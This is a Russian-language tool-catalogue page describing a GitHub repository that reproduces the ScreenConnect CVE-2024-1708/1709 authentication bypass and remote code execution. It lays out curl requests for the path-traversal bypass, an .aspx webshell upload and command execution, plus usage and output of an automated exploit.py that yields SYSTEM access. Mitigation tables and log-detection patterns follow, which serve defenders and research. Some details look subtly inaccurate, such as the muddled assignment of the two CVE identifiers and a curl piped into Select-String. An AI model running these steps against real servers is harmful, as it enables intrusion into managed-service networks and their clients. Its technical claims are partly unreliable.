Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2024-1708-connectwise_rce_reproduction — Воспроизведение cve-2024-1708-connectwise_rce_reproduction | Kitploit
Инструменты/GitHubGitHub/razureink/cve-2024-1708-connectwise_rce_reproduction
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияОбучение и ОбразованиеRed TeamingРазработка Полезной Нагрузки

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHub
razureink/cve-2024-1708-connectwise_rce_reproduction

cve-2024-1708-connectwise_rce_reproduction

Воспроизведение cve-2024-1708-connectwise_rce_reproduction

Репозиторий
27 дней назадЕщё не проверено

CVE-2024-1708 / CVE-2024-1709 — ConnectWise ScreenConnect: обход аутентификации и удалённое выполнение кода

Оценка CVSS: 8.4 (CVE-2024-1708) – 10.0 (CVE-2024-1709)
CWE: CWE-22 (Path Traversal), CWE-288 (Обход аутентификации с использованием альтернативного пути)
Затронутое ПО: ConnectWise ScreenConnect (ранее ScreenConnect) ≤ 23.9.7
Обнаружено и сообщено: февраль 2024 года
Эксплуатировалось в дикой природе: LockBit, Black Basta, Bl00dy и другие филиалы программ-вымогателей


Содержание

  1. Обзор
  2. Технические детали
  3. Затронутые версии
  4. Шаги воспроизведения
  5. Использование proof-of-concept
  6. Смягчение
  7. Ссылки

1. Обзор

CVE-2024-1708 и CVE-2024-1709 — это связка из двух уязвимостей в ConnectWise ScreenConnect (ранее ConnectWise Control), которые вместе позволяют неаутентифицированному удалённому злоумышленнику добиться полного удалённого выполнения кода на сервере ScreenConnect.

  • CVE-2024-1708 — Обход аутентификации через Path Traversal. Конечная точка SetupWizard.aspx (и связанные с ней конечные точки установки/обновления) не выполняет надлежащую санитизацию пользовательских последовательностей обхода пути (../). Неаутентифицированный злоумышленник может выйти за пределы предназначенного каталога установки и получить доступ к конечным точкам, которые должны требовать аутентификацию. Поскольку мастер запускается в контексте учётной записи SYSTEM (Windows) или root (Linux), злоумышленник наследует повышенные привилегии.

  • CVE-2024-1709 — Неограниченная загрузка файла, приводящая к RCE. После обхода аутентификации злоумышленник может загрузить произвольный .aspx или другой исполняемый файл в корень веб-приложения. Затем, запросив загруженный файл, он выполняет произвольный код на сервере.

Влияние

Эти уязвимости массово эксплуатировались начиная с 19 февраля 2024 года несколькими группами программ-вымогателей:

Группа программ-вымогателейОсобенности кампании
LockBitШирокое сканирование экземпляров ScreenConnect; использовалось для последующего развёртывания шифровальщика LockBit.
Black BastaИспользовала доступ к MSP для перехода во внутренние сети управляемых клиентов.
Bl00dyКампании меньшего масштаба, направленные на незапатченные серверы ScreenConnect.

Поскольку ScreenConnect обычно разворачивается поставщиками управляемых услуг (MSP) для удалённого управления сотнями конечных точек клиентов, один скомпрометированный сервер ScreenConnect позволяет провести атаку на цепочку поставок — под угрозой оказывается каждый клиент, агент которого подключён к этому серверу ScreenConnect.


2. Технические детали

2.1 Обход аутентификации (CVE-2024-1708)

Сервер ScreenConnect предоставляет мастер установки по адресу:

root@kitploit:~
/SetupWizard.aspx/

В определённых состояниях обновления/восстановления сервер не применяет аутентификацию, поскольку предполагает, что мастер установки — это интерфейс первого запуска. Критический недостаток заключается в том, как сервер обрабатывает cookie __Session или заголовки Transfer-Encoding / Content-Type при доступе к путям в пространстве имён мастера.

Отправив запрос на:

root@kitploit:~
/SetupWizard.aspx/../../ScreenConnect/Login.aspx

обход пути отменяет контекст «мастера установки», в то время как сервер по-прежнему считает применимым контекст неаутентифицированной сессии. Злоумышленник перенаправляется или получает страницы так, как если бы он был аутентифицирован.

Альтернативный вектор: обработчики PrepareUpgrade.aspx / PostUpgrade.aspx аналогичным образом не имеют проверок аутентификации и предоставляют функциональность загрузки файлов.

2.2 Удалённое выполнение кода (CVE-2024-1709)

Как только злоумышленник достигает аутентифицированной конечной точки (или напрямую обращается к обработчику загрузки файлов в контексте установки), он может загрузить вредоносный веб-шелл .aspx:

root@kitploit:~
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
Content-Type: multipart/form-data; boundary=----BOUNDARY

------BOUNDARY
Content-Disposition: form-data; name="file"; filename="shell.aspx"
Content-Type: application/octet-stream

<%@ Page Language="C#" %>...
------BOUNDARY--

Файл записывается в каталог веб-приложения (например, C:\Program Files\ScreenConnect\Website\). Запрос загруженного шелла выполняет его в контексте учётной записи сервера.

2.3 Корневая причина (CWE-22 / CWE-288)

  • Сервер не выполняет канонизацию пути запроса перед маршрутизацией.
  • Обработчик SetupWizard.aspx доверяет тому, что любой запрос в пределах его маршрута является частью процесса установки и должен обходить аутентификацию, — но обход пути разрушает это допущение.
  • Отсутствует надлежащая проверка последовательностей ../ или обхода символьных ссылок.

3. Затронутые версии

Диапазон версийСтатус
23.9.7 и нижеУязвимы
23.9.8Исправлено (выпущено 20 февраля 2024 г.)
23.9.9Исправлено
23.9.10 (актуальная)Исправлено

Примечание: Основными целями являются самостоятельно размещённые (on-premise) серверы ScreenConnect. Экземпляры ScreenConnect, размещённые в ConnectWise (облачные), были исправлены до публичного раскрытия и никогда не были уязвимы.


4. Шаги воспроизведения

4.1 Лабораторная настройка

  1. Загрузите уязвимую версию ScreenConnect (23.9.7 или более раннюю).
    Официальные установщики могут быть доступны через партнёрские архивы ConnectWise. Для тестирования используйте изолированную ВМ.
  2. Установите на Windows Server (2019/2022) или Linux-хост.
    • Пути установки по умолчанию:
      • Windows: C:\Program Files\ScreenConnect\
      • Linux: /opt/screenconnect/
    • Порт веб-интерфейса по умолчанию: 8040 (HTTP) или 443 (HTTPS, если настроен)
  3. Убедитесь, что сервер изолирован от сети — не открывайте доступ в интернет во время тестирования.

4.2 Проверка уязвимости

root@kitploit:~
# Проверка версии
curl -s http://<target>:8040/ | Select-String "ScreenConnect"

Или откройте веб-интерфейс и обратите внимание на номер версии в исходном коде страницы.

4.3 Тест обхода пути

root@kitploit:~
curl -v --path-as-is "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/Login.aspx"

Ожидаемое поведение на уязвимом сервере:

  • Ответ содержит 200 OK или 302 redirect на страницу с аутентифицированной сессией без обычного запроса входа.
  • В ответе может содержаться HTML-код консоли администратора ScreenConnect.

4.4 Загрузка веб-шелла

root@kitploit:~
curl -X POST "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx" \
  -H "Content-Type: multipart/form-data; boundary=----BOUNDARY" \
  -F "[email protected]"

4.5 Выполнение команд

root@kitploit:~
curl "http://<target>:8040/shell.aspx?cmd=whoami"

5. Использование proof-of-concept

Прилагаемый скрипт exploit.py автоматизирует описанные выше шаги:

root@kitploit:~
usage: exploit.py [-h] -t TARGET [-p PORT] [-c COMMAND] [--ssl]

Exploit CVE-2024-1708/1709 - ConnectWise ScreenConnect Auth Bypass + RCE

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target hostname or IP
  -p PORT, --port PORT  Target port (default: 8040)
  -c COMMAND, --command COMMAND
                        Command to execute (default: whoami)
  --ssl                 Use HTTPS

Example:
  python exploit.py -t 192.168.1.100 -p 8040 -c "whoami"

Пример запуска

root@kitploit:~
$ python exploit.py -t 192.168.1.100 -c "whoami"

[*] Target: 192.168.1.100:8040
[*] Using SSL: False
[*] Step 1: Testing path traversal for auth bypass...
[+] Target appears vulnerable! Server version: 23.9.7
[*] Step 2: Uploading webshell...
[+] Webshell uploaded to: http://192.168.1.100:8040/PoCsAccSwLgSdE.aspx
[*] Step 3: Executing command 'whoami'...
[+] Output:
nt authority\system

6. Смягчение

Немедленные меры (патч)

  • Обновите ScreenConnect до версии 23.9.8 или более поздней.
  • ConnectWise выпустила патчи 20 февраля 2024 года.

Компенсирующие меры

Обнаружение

Найдите следующие IoC в журналах веб-сервера:

root@kitploit:~
GET /SetupWizard.aspx/../../ScreenConnect/
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
GET /*.aspx?cmd=

7. Ссылки


Отказ от ответственности

Этот репозиторий предоставляется только в образовательных целях и для авторизованных исследований в области безопасности. Несанкционированное тестирование систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения, является незаконным. Авторы не несут ответственности за неправомерное использование этой информации.

Скачать инструмент
МераРеализация
Правила WAFБлокировать запросы, содержащие ../ в пути URL после /SetupWizard.aspx/
Сетевая сегментацияРазместите ScreenConnect в отдельной управляющей VLAN со строгой фильтрацией исходящего трафика
Контроль доступаОграничьте доступ к веб-интерфейсу ScreenConnect только доверенными диапазонами IP
МониторингСоздавайте оповещения о запросах к /SetupWizard.aspx/ из внешних источников или о неожиданном создании файлов .aspx в ScreenConnect\Website\
MFAХотя MFA не остановит эту атаку (обход аутентификации происходит до входа в систему), применяйте её для всех административных учётных записей в рамках эшелонированной защиты
ИсточникURL
NVD - CVE-2024-1708https://nvd.nist.gov/vuln/detail/CVE-2024-1708
NVD - CVE-2024-1709https://nvd.nist.gov/vuln/detail/CVE-2024-1709
Бюллетень безопасности ConnectWisehttps://www.connectwise.com/company/trust/security-advisories
Huntress Labs - Первоначальное раскрытиеhttps://www.huntress.com/blog/mass-exploitation-of-connectwise-screenconnect
CISA Known Exploited Vulnerabilitieshttps://www.cisa.gov/known-exploited-vulnerabilities
Техника ATT&CK: External Remote Services (T1133)https://attack.mitre.org/techniques/T1133/